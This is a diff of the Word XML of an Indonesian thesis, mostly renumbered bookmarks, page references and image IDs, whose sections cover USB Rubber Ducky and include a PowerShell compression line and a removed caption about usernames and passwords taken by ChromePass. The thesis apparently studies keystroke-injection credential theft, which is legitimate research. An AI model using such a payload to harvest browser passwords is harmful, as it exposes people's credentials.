-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426579 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427746 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9899,7 +9942,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>60</w:t>
+              <w:t>46</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9925,7 +9968,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426580" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427747" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -9971,7 +10014,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426580 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427747 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9991,7 +10034,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>62</w:t>
+              <w:t>48</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10017,7 +10060,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426581" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427748" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -10063,7 +10106,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426581 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427748 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10083,7 +10126,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>62</w:t>
+              <w:t>48</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10109,7 +10152,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426582" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427749" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -10155,7 +10198,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426582 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427749 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10175,7 +10218,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>63</w:t>
+              <w:t>49</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10200,7 +10243,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426583" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427750" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -10227,7 +10270,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426583 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427750 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10247,7 +10290,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>64</w:t>
+              <w:t>50</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10344,16 +10387,16 @@
       <w:pPr>
         <w:pStyle w:val="NONBAB"/>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc75146103"/>
-      <w:bookmarkStart w:id="21" w:name="_Toc463344418"/>
-      <w:bookmarkStart w:id="22" w:name="_Toc43426523"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc75146103"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc463344418"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc43427690"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>DAFTAR GAMBAR DAN ILUSTRASI</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="20"/>
       <w:bookmarkEnd w:id="21"/>
       <w:bookmarkEnd w:id="22"/>
+      <w:bookmarkEnd w:id="23"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14134,16 +14177,16 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="23" w:name="_Toc75146104"/>
-      <w:bookmarkStart w:id="24" w:name="_Toc463344419"/>
-      <w:bookmarkStart w:id="25" w:name="_Toc43426524"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc75146104"/>
+      <w:bookmarkStart w:id="25" w:name="_Toc463344419"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc43427691"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>DAFTAR TABEL</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="23"/>
       <w:bookmarkEnd w:id="24"/>
       <w:bookmarkEnd w:id="25"/>
+      <w:bookmarkEnd w:id="26"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14793,7 +14836,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="26" w:name="_Toc43426525"/>
+      <w:bookmarkStart w:id="27" w:name="_Toc43427692"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">DAFTAR </w:t>
@@ -14804,7 +14847,7 @@
         </w:rPr>
         <w:t>ISTILAH</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="26"/>
+      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15793,7 +15836,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="_Toc43426526"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc43427693"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">DAFTAR </w:t>
@@ -15804,7 +15847,7 @@
         </w:rPr>
         <w:t>SINGKATAN</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="27"/>
+      <w:bookmarkEnd w:id="28"/>
     </w:p>
     <w:p/>
     <w:p/>
@@ -16204,11 +16247,16 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:bookmarkStart w:id="28" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="28"/>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
+      <w:pPr>
+        <w:sectPr>
+          <w:footerReference w:type="default" r:id="rId13"/>
+          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
+          <w:pgMar w:top="1701" w:right="1701" w:bottom="1701" w:left="2268" w:header="851" w:footer="851" w:gutter="0"/>
+          <w:pgNumType w:fmt="lowerRoman" w:start="1"/>
+          <w:cols w:space="720"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16216,7 +16264,7 @@
       </w:pPr>
       <w:bookmarkStart w:id="29" w:name="_Toc75146106"/>
       <w:bookmarkStart w:id="30" w:name="_Toc463344421"/>
-      <w:bookmarkStart w:id="31" w:name="_Toc43426527"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc43427694"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -16236,7 +16284,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="32" w:name="_Toc43426528"/>
+      <w:bookmarkStart w:id="32" w:name="_Toc43427695"/>
       <w:r>
         <w:t>Latar Belakang</w:t>
       </w:r>
@@ -17048,7 +17096,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="38" w:name="_Toc43426529"/>
+      <w:bookmarkStart w:id="38" w:name="_Toc43427696"/>
       <w:r>
         <w:t>Rumusan Masalah</w:t>
       </w:r>
@@ -17189,7 +17237,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="39" w:name="_Toc43426530"/>
+      <w:bookmarkStart w:id="39" w:name="_Toc43427697"/>
       <w:r>
         <w:t>Tujuan Penelitian</w:t>
       </w:r>
@@ -17336,7 +17384,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="40" w:name="_Toc43426531"/>
+      <w:bookmarkStart w:id="40" w:name="_Toc43427698"/>
       <w:r>
         <w:t>Manfaat Penelitian</w:t>
       </w:r>
@@ -17455,7 +17503,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="41" w:name="_Toc43426532"/>
+      <w:bookmarkStart w:id="41" w:name="_Toc43427699"/>
       <w:r>
         <w:t>Batasan Masalah</w:t>
       </w:r>
@@ -17585,7 +17633,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="42" w:name="_Toc43426533"/>
+      <w:bookmarkStart w:id="42" w:name="_Toc43427700"/>
       <w:r>
         <w:t>Sistematika Penulisan</w:t>
       </w:r>
@@ -17599,15 +17647,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Sistematika penulisan penelitian ini adalah sebagai </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>berikut :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Sistematika penulisan penelitian ini adalah sebagai berikut : </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17784,7 +17824,7 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="43" w:name="_Toc43426534"/>
+      <w:bookmarkStart w:id="43" w:name="_Toc43427701"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Kajian Teori</w:t>
@@ -17800,7 +17840,7 @@
           <w:iCs/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="44" w:name="_Toc43426535"/>
+      <w:bookmarkStart w:id="44" w:name="_Toc43427702"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18143,7 +18183,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:bookmarkStart w:id="46" w:name="_Hlk43330864"/>
-      <w:bookmarkStart w:id="47" w:name="_Toc43426536"/>
+      <w:bookmarkStart w:id="47" w:name="_Toc43427703"/>
       <w:r>
         <w:rPr>
           <w:iCs/>
@@ -18521,7 +18561,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="49" w:name="_Toc43426537"/>
+      <w:bookmarkStart w:id="49" w:name="_Toc43427704"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -18700,7 +18740,7 @@
           <w:i/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="50" w:name="_Toc43426538"/>
+      <w:bookmarkStart w:id="50" w:name="_Toc43427705"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18972,7 +19012,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="51" w:name="_Toc43426539"/>
+      <w:bookmarkStart w:id="51" w:name="_Toc43427706"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -19247,7 +19287,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="55" w:name="_Toc43426540"/>
+      <w:bookmarkStart w:id="55" w:name="_Toc43427707"/>
       <w:r>
         <w:t xml:space="preserve">Microsoft </w:t>
       </w:r>
@@ -19537,7 +19577,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="57" w:name="_Toc43426541"/>
+      <w:bookmarkStart w:id="57" w:name="_Toc43427708"/>
       <w:r>
         <w:t>Sistem Operasi</w:t>
       </w:r>
@@ -19709,7 +19749,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="59" w:name="_Toc43426542"/>
+      <w:bookmarkStart w:id="59" w:name="_Toc43427709"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -19963,7 +20003,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="61" w:name="_Toc43426543"/>
+      <w:bookmarkStart w:id="61" w:name="_Toc43427710"/>
       <w:r>
         <w:t>USB Rubber Ducky</w:t>
       </w:r>
@@ -20424,13 +20464,8 @@
         <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Contoh :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> SHIFT DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW, DOWNARROW, LEFTARROW, RIGHTARROW, TAB.</w:t>
+      <w:r>
+        <w:t>Contoh : SHIFT DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW, DOWNARROW, LEFTARROW, RIGHTARROW, TAB.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20465,15 +20500,7 @@
         <w:t>sistem</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> operasi windows. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Contoh :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> CONTROL/CTRL BREAK, PAUSE, F1</w:t>
+        <w:t xml:space="preserve"> operasi windows. Contoh : CONTROL/CTRL BREAK, PAUSE, F1</w:t>
       </w:r>
       <w:r>
         <w:t>…</w:t>
@@ -20515,13 +20542,8 @@
         <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Contoh :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ALT END, ESC, ESCAPE, F1</w:t>
+      <w:r>
+        <w:t>Contoh : ALT END, ESC, ESCAPE, F1</w:t>
       </w:r>
       <w:r>
         <w:t>…</w:t>
@@ -20569,7 +20591,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="62" w:name="_Toc43426544"/>
+      <w:bookmarkStart w:id="62" w:name="_Toc43427711"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Perbandingan dengan penelitian sebelumnya</w:t>
@@ -21055,7 +21077,7 @@
         <w:pStyle w:val="Heading1"/>
         <w:ind w:hanging="142"/>
       </w:pPr>
-      <w:bookmarkStart w:id="64" w:name="_Toc43426545"/>
+      <w:bookmarkStart w:id="64" w:name="_Toc43427712"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Metodologi Penelitian</w:t>
@@ -21075,7 +21097,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="67" w:name="_Toc43426546"/>
+      <w:bookmarkStart w:id="67" w:name="_Toc43427713"/>
       <w:r>
         <w:t>Metode Konseptual</w:t>
       </w:r>
@@ -21128,7 +21150,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13">
+                    <a:blip r:embed="rId14">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -21233,7 +21255,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="69" w:name="_Toc43426547"/>
+      <w:bookmarkStart w:id="69" w:name="_Toc43427714"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -21297,8 +21319,8 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:191.3pt;height:635.1pt">
-            <v:imagedata r:id="rId14" o:title="Sistematika Penelitian"/>
+          <v:shape id="_x0000_i1059" type="#_x0000_t75" style="width:191.3pt;height:635.1pt">
+            <v:imagedata r:id="rId15" o:title="Sistematika Penelitian"/>
           </v:shape>
         </w:pict>
       </w:r>
@@ -21372,7 +21394,7 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="71" w:name="_Toc43426548"/>
+      <w:bookmarkStart w:id="71" w:name="_Toc43427715"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Inisiasi</w:t>
@@ -21409,7 +21431,7 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="72" w:name="_Toc43426549"/>
+      <w:bookmarkStart w:id="72" w:name="_Toc43427716"/>
       <w:r>
         <w:t>Hipotesis</w:t>
       </w:r>
@@ -21435,7 +21457,7 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="73" w:name="_Toc43426550"/>
+      <w:bookmarkStart w:id="73" w:name="_Toc43427717"/>
       <w:r>
         <w:t>Simulasi</w:t>
       </w:r>
@@ -21601,7 +21623,7 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="74" w:name="_Toc43426551"/>
+      <w:bookmarkStart w:id="74" w:name="_Toc43427718"/>
       <w:r>
         <w:t>Akhir</w:t>
       </w:r>
@@ -21640,7 +21662,7 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="75" w:name="_Toc43426552"/>
+      <w:bookmarkStart w:id="75" w:name="_Toc43427719"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Pelaporan</w:t>
@@ -21665,7 +21687,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="76" w:name="_Toc43426553"/>
+      <w:bookmarkStart w:id="76" w:name="_Toc43427720"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -21723,7 +21745,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="77" w:name="_Toc43426554"/>
+      <w:bookmarkStart w:id="77" w:name="_Toc43427721"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -21843,7 +21865,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15">
+                    <a:blip r:embed="rId16">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -22129,7 +22151,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="81" w:name="_Toc43426555"/>
+      <w:bookmarkStart w:id="81" w:name="_Toc43427722"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -22927,7 +22949,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="84" w:name="_Toc43426556"/>
+      <w:bookmarkStart w:id="84" w:name="_Toc43427723"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -23921,7 +23943,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="87" w:name="_Toc43426557"/>
+      <w:bookmarkStart w:id="87" w:name="_Toc43427724"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -24432,7 +24454,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16">
+                    <a:blip r:embed="rId17">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -25453,7 +25475,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="93" w:name="_Toc43426558"/>
+      <w:bookmarkStart w:id="93" w:name="_Toc43427725"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -25537,7 +25559,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="94" w:name="_Toc43426559"/>
+      <w:bookmarkStart w:id="94" w:name="_Toc43427726"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -32696,7 +32718,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="119" w:name="_Toc43426560"/>
+      <w:bookmarkStart w:id="119" w:name="_Toc43427727"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -33311,25 +33333,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>Add-Type -assembly "</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>system.io.compression</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>.filesystem"</w:t>
+                              <w:t>Add-Type -assembly "system.io.compression.filesystem"</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -33432,25 +33436,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>Add-Type -assembly "</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>system.io.compression</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>.filesystem"</w:t>
+                        <w:t>Add-Type -assembly "system.io.compression.filesystem"</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -33637,7 +33623,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="127" w:name="_Toc43426561"/>
+      <w:bookmarkStart w:id="127" w:name="_Toc43427728"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -33748,172 +33734,6 @@
             <wp:extent cx="5040630" cy="945515"/>
             <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
             <wp:docPr id="36" name="Picture 36"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5040630" cy="945515"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:ind w:left="720" w:firstLine="720"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="128" w:name="_Toc43087616"/>
-      <w:bookmarkStart w:id="129" w:name="_Toc43087910"/>
-      <w:bookmarkStart w:id="130" w:name="_Toc43425296"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Gambar IV- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> SEQ Gambar_IV- \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>13</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Username </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Password</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> yang Diambil oleh ChromePass</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="128"/>
-      <w:bookmarkEnd w:id="129"/>
-      <w:bookmarkEnd w:id="130"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="633"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepNext/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="633"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A76AE75" wp14:editId="0419A557">
-            <wp:extent cx="5040630" cy="991235"/>
-            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
-            <wp:docPr id="46" name="Picture 46"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -33933,6 +33753,172 @@
                   <pic:spPr>
